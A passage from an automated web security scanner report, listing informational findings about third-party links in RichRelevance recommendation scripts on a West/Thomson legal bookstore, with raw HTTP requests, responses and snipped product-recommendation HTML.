Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=3d67d3c1-f356-442c-f616-e44be4d19914; vihc=b73.1303848202747.21158348%7C; pvihc=b73.1303848202747.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:31 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: pendprch=b73.1303848211052.%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D.24512906%7C; Expires=Sun, 14-May-2079 23:17:38 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19175

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'cart_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
2321&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2321%2F13517594%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="McCarthy on Trademarks and Unfair Competition, 4th"><img src="http://images.west.thomson.com/store/product_photos/p13517594-2321S.jpg" alt="McCarthy on Trademarks and Unfair Competition, 4th" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=2321&MaterialNumber=13517594&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn2321" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=right&hpi=906&stn=PurchaseEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=2321&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F2321%2F13517594%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
g=179&p=160118&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160118%2F12370847%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Federal Civil Rules Handbook, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p12370847-160118S.JPG" alt="Federal Civil Rules Handbook, 2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160118&MaterialNumber=12370847&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160118" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=right&hpi=906&stn=PurchaseEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=160118&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160118%2F12370847%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
2F%2Fwest.thomson.com%2Fproductdetail%2F164754%2F13514087%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Federal Rules of Civil Procedure, Rules and Commentary, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p13514087-164754S.JPG" alt="Federal Rules of Civil Procedure, Rules and Commentary, 2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=164754&MaterialNumber=13514087&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn164754" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=right&hpi=906&stn=PurchaseEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=164754&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F164754%2F13514087%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F162495%2F22061301%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Federal Civil Judicial Procedure and Rules, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22061301-162495S.JPG" alt="Federal Civil Judicial Procedure and Rules, 2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn162495" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=bottom&hpi=905&stn=ViewedPurchasedPercent&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=162495&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F162495%2F22061301%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160605%2F17160909%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Civil Rules Handbook, 2010-2011 ed. (Vol. 31, Missouri Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/17160907.jpg" alt="Civil Rules Handbook, 2010-2011 ed. (Vol. 31, Missouri Practice Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160605&MaterialNumber=17160909&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160605" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=bottom&hpi=905&stn=ViewedPurchasedPercent&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=160605&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160605%2F17160909%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
ail%2F174319%2F15347617%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Pennsylvania Rules of Court - State and Federal, 2011 ed. (Vols. I & II, Pennsylvania Court Rules)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Pennsylvania Rules of Court - State and Federal, 2011 ed. (Vols. I & II, Pennsylvania Court Rules)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=174319&MaterialNumber=15347617&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn174319" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=bottom&hpi=905&stn=ViewedPurchasedPercent&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=174319&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F174319%2F15347617%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...
il%2F173387%2F18458383%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal" title="Illinois Court Rules and Procedure - State and Federal, 2011 ed. (Vols. I-II, Illinois Court Rules)"><img src="http://images.west.thomson.com/store/product_photos/p18458383-173387S.JPG" alt="Illinois Court Rules and Procedure - State and Federal, 2011 ed. (Vols. I-II, Illinois Court Rules)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=173387&MaterialNumber=18458383&Product_type=1&promcode=600582C43554&promtype=internal"><img src="http://images.west.thomson.com/buttons/PreorderSmall.gif" border="0" id="rrimgbtn173387" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=343738fc-723b-4cac-d41a-b44be4d21aca&pti=3&pa=bottom&hpi=905&stn=ViewedPurchasedPercent&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=3d67d3c1-f356-442c-f616-e44be4d19914&s=bijb1vookoje2tnvwh5oouwn&pg=179&p=173387&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F173387%2F18458383%2Fproductdetail.aspx%3Fpromcode%3D600582C43554%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.104. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848421183&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848401787.21158348%7C; pvihc=b73.1303848401787.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:06:52 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848412428.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848412428.21158348%7C; Expires=Fri, 23-Apr-2021 20:06:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19481

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
homson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p11634476-159396S.JPG" alt="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159396&MaterialNumber=11634476&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
9&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Code, Rules and Forms, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22035157-160036S.JPG" alt="Bankruptcy Code, Rules and Forms, 2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160036&MaterialNumber=22035157&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160036" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy and Domestic Relations Manual, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40340361-159259S.JPG" alt="Bankruptcy and Domestic Relations Manual, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159259&MaterialNumber=40340361&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159259" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159259&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
son.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)"><img src="http://images.west.thomson.com/store/product_photos/p11226789-520S.jpg" alt="Federal Civil Procedure Before Trial (The Rutter Group California Practice Guide)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=520&MaterialNumber=11226789&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn520" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=520&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F520%2F11226789%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
itle="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)"><img src="http://images.west.thomson.com/store/product_photos/p40888206-174615S.JPG" alt="Chapter 7 Consumer Bankruptcy Strategies, 2010 ed.: Leading Lawyers on Preparing a Chapter 7 Filing, Establishing Effective Client Strategies, and Understanding Recent Trends (Inside the Minds)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=174615&MaterialNumber=40888206&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn174615" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=174615&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F174615%2F40888206%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
oductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Criminal Offenses and Defenses in Tennessee, 2010-2011 ed. (The Tennessee Handbook Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159383&MaterialNumber=40121151&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159383" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=6881690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=PurchaseCP&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159383&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159383%2F40121151%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.105. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848426212&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848412428.21158348%7C; pvihc=b73.1303848412428.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:06:56 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848416420.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848416420.21158348%7C; Expires=Fri, 23-Apr-2021 20:06:56 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 13929

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=68d7690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
homson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p11634476-159396S.JPG" alt="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159396&MaterialNumber=11634476&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=68d7690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
9&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Code, Rules and Forms, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22035157-160036S.JPG" alt="Bankruptcy Code, Rules and Forms, 2011 ed." style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160036&MaterialNumber=22035157&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160036" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=68d7690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=right&hpi=903&stn=ViewedPurchased&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160036&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160036%2F22035157%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p12484463-160547S.JPG" alt="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160547&MaterialNumber=12484463&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160547" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=68d7690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=BuyTogether&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160547&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy and Domestic Relations Manual, 2010-2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p40340361-159259S.JPG" alt="Bankruptcy and Domestic Relations Manual, 2010-2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159259&MaterialNumber=40340361&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159259" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=68d7690e-c6eb-48e0-10ca-254be4d085db&pti=1&pa=bottom&hpi=787&stn=BuyTogether&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159259&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159259%2F40340361%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.106. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
